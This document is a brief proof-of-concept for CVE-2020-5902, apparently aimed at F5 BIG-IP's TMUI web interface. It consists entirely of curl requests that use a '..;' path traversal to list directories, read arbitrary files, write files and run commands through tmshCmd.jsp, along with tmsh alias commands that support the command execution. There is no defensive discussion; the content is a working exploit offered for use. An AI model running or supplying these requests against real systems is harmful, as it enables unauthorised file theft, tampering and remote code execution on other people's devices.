Proof of Concept for CVE-2020-5902
curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/path/here/"
curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/path/to/file"
curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=<filename>&content=<content>"
tmsh create cli alias private <aliasname> command "command"
tmsh delete cli alias private <aliasname>
curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=<command+here>"